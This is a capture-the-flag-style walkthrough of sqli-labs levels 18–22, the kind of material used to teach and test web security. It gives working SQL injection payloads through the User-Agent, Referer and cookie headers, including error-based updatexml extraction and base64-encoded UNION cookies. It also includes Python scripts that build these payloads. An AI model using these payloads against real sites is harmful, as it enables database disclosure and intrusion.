Less-18: injection via the User-Agent header
Source analysis:
check_input() filters the POST username and password fields:
function check_input($value)
{
    // Truncate to 20 characters (limits how much an attacker can send)
    if(!empty($value))
    {
        $value = substr($value,0,20);
    }
    // Stripslashes if magic quotes enabled (magic quotes were removed in PHP 5.4)
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote and escape if not a number, otherwise cast to int
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}
The login query is then run and checked, so the next step is only reached with a valid username and password. After that the script logs the visit with an INSERT into the uagents table (uagent, ip_address, username), and the User-Agent value goes in unescaped because it never passes through check_input(); that is the injection point.
payload: User-Agent: ' or updatexml(1,concat('#',(database())),0),'','')#
The two '' fillers supply the remaining two columns and # comments out the rest of the statement. With the wrong number of fillers the column count no longer matches and MySQL rejects the INSERT before updatexml() is ever evaluated, so nothing leaks. The '#' inside concat() makes the XPath invalid, so database() is echoed back in the error message; note that updatexml() only shows the first 32 characters of the string.
Less-19: injection via the Referer header
Same as above, but the referers INSERT has only two columns (referer, ip_address), so one filler:
Referer: ' or updatexml(1,concat('#',(database())),0),'')#
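To see why the POST fields are safe while the headers are not, and why the number of '' fillers matters, here is an added Python emulation of the Less-18/19 server-side string building (example code, not from the page or from sqli-labs). It ports the page's check_input(), builds the two INSERT statements with the table and column layout assumed from the lab's source, and counts how many expressions MySQL actually sees inside VALUES(...) once string literals, nested parentheses and the '#' comment are accounted for. magic_quotes is assumed off.

```python
# Added example (not from the page or sqli-labs): emulate how Less-18/19 build
# their SQL so the difference between a filtered POST field and a raw header
# is visible. Table and column names of the two INSERTs are assumed from the
# lab's source; magic_quotes is assumed off.
import re

_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}


def mysql_real_escape_string(value: str) -> str:
    """Backslash-escape the characters mysql_real_escape_string() handles."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def check_input(value: str) -> str:
    """Python port of the page's check_input(): truncate to 20 chars, then
    either quote+escape (non-numeric) or cast to int (all digits)."""
    if value:
        value = value[:20]
    if not re.fullmatch(r"[0-9]+", value):      # ctype_digit('') is false too
        return "'" + mysql_real_escape_string(value) + "'"
    return str(int(value))


def less18_insert(uagent: str, ip: str, uname: str) -> str:
    """Less-18 logs the visit; uagent is concatenated raw (assumed layout)."""
    return ("INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) "
            f"VALUES ('{uagent}', '{ip}', {uname})")


def less19_insert(referer: str, ip: str) -> str:
    """Less-19: same idea, two columns (assumed layout)."""
    return ("INSERT INTO `security`.`referers` (`referer`, `ip_address`) "
            f"VALUES ('{referer}', '{ip}')")


def value_count(sql: str) -> int:
    """Count the expressions MySQL sees inside VALUES(...): honours string
    literals, nested parentheses and a '#' comment that cuts the statement."""
    body = sql[sql.upper().index("VALUES") + len("VALUES"):]
    depth, count, quote, i = 0, 1, None, 0
    while i < len(body):
        ch = body[i]
        if quote:                       # inside a string literal
            if ch == "\\":
                i += 1                  # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "#":                 # comment: MySQL ignores the rest
            break
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                break                   # end of the VALUES list
        elif ch == "," and depth == 1:
            count += 1
        i += 1
    return count


# Header payloads: one '' filler per remaining column, then '#' to discard
# whatever the script appends after the injected value.
LESS18_UA = "' or updatexml(1,concat('#',(database())),0),'','')#"
LESS19_REFERER = "' or updatexml(1,concat('#',(database())),0),'')#"


def demo() -> dict:
    """Constructed inputs: an injection attempt in the POST field and the two header payloads."""
    uname = check_input("' or 1=1#")    # POST field: escaped and quoted, harmless
    ua_sql = less18_insert(LESS18_UA, "127.0.0.1", uname)
    ref_sql = less19_insert(LESS19_REFERER, "127.0.0.1")
    return {
        "uname": uname,
        "ua_values": value_count(ua_sql),          # 3 == columns, so updatexml() runs
        "ref_values": value_count(ref_sql),        # 2 == columns
        # the Less-19 payload on the Less-18 INSERT: 2 != 3, MySQL raises a column-count error
        "swapped": value_count(less18_insert(LESS19_REFERER, "127.0.0.1", uname)),
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, "=", val)
```

Run it to print the escaped POST value next to the value counts; the "swapped" entry is the mismatch case that produces a column-count error instead of the updatexml() leak.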
Less-20: injection via the cookie
Again the POST username and password are filtered, but uname taken from the cookie is not.
The account and password still have to be correct, since the cookie is only set after a successful login.
The source below shows that when the form is not POSTed, uname is read straight from the cookie and dropped into the query:
if(!isset($_POST['submit']))
{
    // No form submission: take uname straight from the cookie (never passed through check_input)
    $cookee = $_COOKIE['uname'];
    $format = 'D d M Y - H:i:s';
    $timestamp = time() + 3600;
    echo "<center>";
    echo '<br><br><br>';
    echo '<img src="../images/Less-20.jpg" />';
    echo "<br><br><b>";
    echo '<br><font color= "red" font size="4">';
    echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
    echo "</font><br>";
    echo '<font color= "cyan" font size="4">';
    echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
    echo "</font><br>";
    echo '<font color= "#FFFF00" font size = 4 >';
    echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
    echo '<font color= "orange" font size = 5 >';
    echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
    echo "<br></font>";
    // The raw cookie value lands between the single quotes: this is the injection point
    $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
    $result=mysql_query($sql);
    // (the rest of the branch, which fetches and prints the row, is not shown on the page)
}
payload: Cookie: uname=' union select 1,2,3 -- #
Less-21
Source analysis: username and passwd are filtered in the same way.
The difference: the cookie value is base64-encoded (the lab decodes it before use), and the decoded value is placed inside ('...') in the SQL statement, which is why the payload has to open with ').
Construct the payload, the base64 encoding of ') union select 1,2,3 -- #:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMiwzIC0tICM=
Less-22
Same as above, but the decoded value is wrapped in double quotes, so the injected string must close with " instead of ') before being base64-encoded.
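The three cookie levels differ only in how the query wraps the cookie value and whether it is base64-encoded, so one small script covers Less-20, Less-21 and Less-22. This is an added example (not from the page or from sqli-labs): the wrapping for each level is assumed from the page's payloads (bare ' for Less-20, ('...') for Less-21 as the decoded cookie shows, "..." for Less-22), three UNION markers are used because the page's payloads use three, and the page's own Less-21 cookie is decoded as a check.

```python
# Added example (not from the page or sqli-labs): build, encode and decode the
# cookie payloads for Less-20/21/22. How each level wraps the cookie value in
# its SELECT is assumed from the page's payloads.
import base64

# (opening, closing) text around the cookie value in each level's query (assumed)
WRAP = {20: ("'", "'"), 21: ("('", "')"), 22: ('"', '"')}


def render_query(level: int, cookee: str) -> str:
    """The SELECT the lab runs, with the cookie value substituted unescaped."""
    opening, closing = WRAP[level]
    return f"SELECT * FROM users WHERE username={opening}{cookee}{closing} LIMIT 0,1"


def union_payload(level: int, columns: int = 3) -> str:
    """Close the quoting for this level, UNION in numbered markers, comment out the rest."""
    closing = WRAP[level][1]
    markers = ",".join(str(n) for n in range(1, columns + 1))
    return f"{closing} union select {markers} -- #"


def cookie_value(level: int, columns: int = 3) -> str:
    """Value to send as Cookie: uname=...; Less-21/22 expect base64."""
    raw = union_payload(level, columns)
    if level == 20:
        return raw
    return base64.b64encode(raw.encode()).decode()


def decode_cookie(value: str) -> str:
    """Reverse of cookie_value() for Less-21/22, to check a captured cookie."""
    return base64.b64decode(value).decode()


if __name__ == "__main__":
    page_cookie = "JykgdW5pb24gc2VsZWN0IDEsMiwzIC0tICM="   # the Less-21 cookie from the page
    print("page cookie decodes to:", decode_cookie(page_cookie))
    for level in (20, 21, 22):
        print(f"Less-{level}: Cookie: uname={cookie_value(level)}")
        print("   query:", render_query(level, union_payload(level)))
```

The rendered query for each level shows the closing sequence landing exactly where the lab's own quotes end, which is the check to make before base64-encoding a payload for Less-21 or Less-22.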